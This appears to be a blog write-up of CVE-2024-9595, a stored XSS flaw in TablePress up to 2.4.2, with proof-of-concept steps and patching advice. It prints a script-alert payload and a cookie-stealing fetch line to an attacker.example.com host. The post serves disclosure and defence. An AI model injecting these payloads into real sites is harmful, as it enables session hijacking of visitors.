CVE-2024-9595 - Exploiting Stored XSS in TablePress WordPress Plugin (v2.4.2 and Below)

---

Introduction

A critical vulnerability, tracked as CVE-2024-9595, has been identified in the popular WordPress plugin TablePress (up to version 2.4.2). This flaw lets attackers execute stored Cross-Site Scripting (XSS) by injecting malicious scripts into table cells. This post breaks down what this means, shows how simple the exploit is, and guides you on how to protect your site.

About TablePress

TablePress is one of the most widely-used plugins for creating dynamic, responsive tables in WordPress. It’s trusted by hundreds of thousands of websites for its flexibility and ease of use. Unfortunately, this popularity makes it a juicy target for attackers.

The Security Vulnerability

In TablePress versions 2.4.2 and below, anyone with at least Author privileges can insert JavaScript payloads directly into table cell content. The plugin fails to fully sanitize or escape this input, so the script gets saved to the database and is executed in the browser of anyone who visits the page displaying the table.

Attack is persistent ("stored") – it affects all visitors who view the malicious page.

- Only "Author" level or higher accounts are required – contributors and subscribers can't use this exploit by default.

Attacker logs in with an Account that has Author-level permission or above.

2. Creates/edits a Table using TablePress.

Inserts Malicious JavaScript into one of the table cells.

4. Publishes/Updates the Table so the script is stored in the database.

Visitors (or admins) who view this table trigger the malicious code within their browser.

This exploit doesn’t require any advanced skills and can be used for a variety of attacks, including stealing session cookies or redirecting users.

Exploit Chain

- User with correct privileges → Edits TablePress table → Inserts XSS payload → Saves table → XSS fires on victim's browser

Proof-of-Concept Code

Below is a step-by-step PoC you can try on a test site (never use exploits on live websites or without permission!):

3. In a cell, insert this code

<script>alert('XSS by CVE-2024-9595')</script>

!PoC Screenshot
*Example of inserting the payload into TablePress cell.*

4. Save and insert the table into any page or post using the shortcode, like

[table id=1 /]

5. Visit the page on the front end.

Result:
An alert should pop up, showing that the JavaScript executed – this is your stored XSS.

*With a real attack, the script would do something more malicious, like stealing cookies:*

<script>fetch('https://attacker.example.com/?cookie='+document.cookie);</script>

## How to Fix / Protect Your Site

Upgrade TablePress to the latest, patched version!

- Download or update TablePress
- Sanitize user input, especially if you're a plugin/theme developer.

If you visit sites with TablePress tables, always keep your browser and antivirus up to date.

- Be cautious when interacting with unfamiliar sites, especially if you see unexpected JavaScript alerts or redirects.

General Recommendations

- Enable security plugins like Wordfence or Sucuri for extra scans.

References

- NVD Listing for CVE-2024-9595
- Wordfence Advisory on TablePress XSS
- TablePress Plugin Page
- XSS Explained – OWASP

Summary

CVE-2024-9595 proves even the best-loved plugins can have serious security gaps. Anyone running a WordPress site with TablePress should update immediately. This stored XSS can have serious consequences if left unpatched – but fixing it is as simple as updating the plugin and reviewing user privileges.

*Stay safe, stay updated, and never underestimate WordPress plugin vulnerabilities!*


*If you found this article useful, please share to help others keep their websites secure!*

Timeline

Published on: 10/12/2024 09:15:03 UTC
Last modified on: 10/15/2024 12:57:46 UTC